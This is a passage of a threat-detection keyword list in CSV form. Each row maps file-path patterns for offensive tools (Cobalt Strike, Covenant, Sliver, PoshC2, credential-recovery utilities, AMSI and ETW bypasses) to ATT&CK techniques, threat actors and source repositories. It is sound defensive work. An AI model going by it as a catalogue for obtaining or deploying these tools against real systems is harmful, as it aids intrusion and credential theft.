Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9380" "*/On_Demand_C2/*",".{0,1000}\/On_Demand_C2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","9381" "*/onedrive_user_enum*",".{0,1000}\/onedrive_user_enum.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","9382" "*/oneliner.tpl*",".{0,1000}\/oneliner\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9383" "*/oneliner2.tpl*",".{0,1000}\/oneliner2\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9384" "*/onesixtyone/dict.txt*",".{0,1000}\/onesixtyone\/dict\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","9385" "*/onex.git*",".{0,1000}\/onex\.git.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9386" "*/onionpipe.git*",".{0,1000}\/onionpipe\.git.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9387" "*/onionpipe/releases/latest*",".{0,1000}\/onionpipe\/releases\/latest.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9388" "*/onionpipe:main*",".{0,1000}\/onionpipe\:main.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","9389" 
"*/open_vas.rb*",".{0,1000}\/open_vas\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9390" "*/openbullet.git*",".{0,1000}\/openbullet\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","9391" "*/OpenBullet2.git*",".{0,1000}\/OpenBullet2\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","9392" "*/openflow-info.nse*",".{0,1000}\/openflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9393" "*/openlookup-info.nse*",".{0,1000}\/openlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9394" "*/openvas-otp-brute.nse*",".{0,1000}\/openvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9395" "*/openwebnet-discovery.nse*",".{0,1000}\/openwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9397" "*/operapassview.zip",".{0,1000}\/operapassview\.zip","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9398" "*/opt/.exegol_aliases*",".{0,1000}\/opt\/\.exegol_aliases.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9399" "*/opt/chimera*",".{0,1000}\/opt\/chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","9400" "*/opt/cobaltstrike/*",".{0,1000}\/opt\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph 
API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#linux","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","9401" "*/opt/cobaltstrike/logs*",".{0,1000}\/opt\/cobaltstrike\/logs.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","#linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","9402" "*/opt/cobaltstrike-nemesis*",".{0,1000}\/opt\/cobaltstrike\-nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9403" "*/opt/Covenant/Covenant/*",".{0,1000}\/opt\/Covenant\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","#linux","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","9405" "*/opt/dnscrypt-proxy*",".{0,1000}\/opt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","9407" "*/opt/gocrack/files/engine*",".{0,1000}\/opt\/gocrack\/files\/engine.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","9410" "*/opt/gocrack/files/task*",".{0,1000}\/opt\/gocrack\/files\/task.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","9411" "*/opt/gspy_log.txt*",".{0,1000}\/opt\/gspy_log\.txt.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#linux #logfile","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","9412" "*/opt/HttpRedirector/conf/periscope.key*",".{0,1000}\/opt\/HttpRedirector\/conf\/periscope\.key.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","9413" 
"*/opt/icebreaker*",".{0,1000}\/opt\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","9414" "*/opt/implant/*",".{0,1000}\/opt\/implant\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9415" "*/opt/localtonet*",".{0,1000}\/opt\/localtonet.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#linux","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","9416" "*/opt/lwp-scripts*",".{0,1000}\/opt\/lwp\-scripts.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9417" "*/opt/lwp-wordlists*",".{0,1000}\/opt\/lwp\-wordlists.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9418" "*/opt/merlin/*",".{0,1000}\/opt\/merlin\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","9419" "*/opt/metasploit-framework*",".{0,1000}\/opt\/metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","9420" "*/opt/nessus/*",".{0,1000}\/opt\/nessus\/.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","9421" "*/opt/Ninja/*",".{0,1000}\/opt\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9422" "*/opt/Password_Cracking/*",".{0,1000}\/opt\/Password_Cracking\/.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9423" "*/opt/periscope/ControlCenter/db/periscope.db*",".{0,1000}\/opt\/periscope\/ControlCenter\/db\/periscope\.db.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","9424" "*/opt/PoshC2*",".{0,1000}\/opt\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9425" 
"*/opt/Projects/AmsiBypass/*",".{0,1000}\/opt\/Projects\/AmsiBypass\/.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","#linux","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","9426" "*/opt/rai/*",".{0,1000}\/opt\/rai\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9427" "*/opt/seclists/Discovery/*",".{0,1000}\/opt\/seclists\/Discovery\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9430" "*/opt/shellcode/blocketw.bin*",".{0,1000}\/opt\/shellcode\/blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#content","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","9431" "*/opt/sliver-server*",".{0,1000}\/opt\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","9432" "*/optiv/Dent/*",".{0,1000}\/optiv\/Dent\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 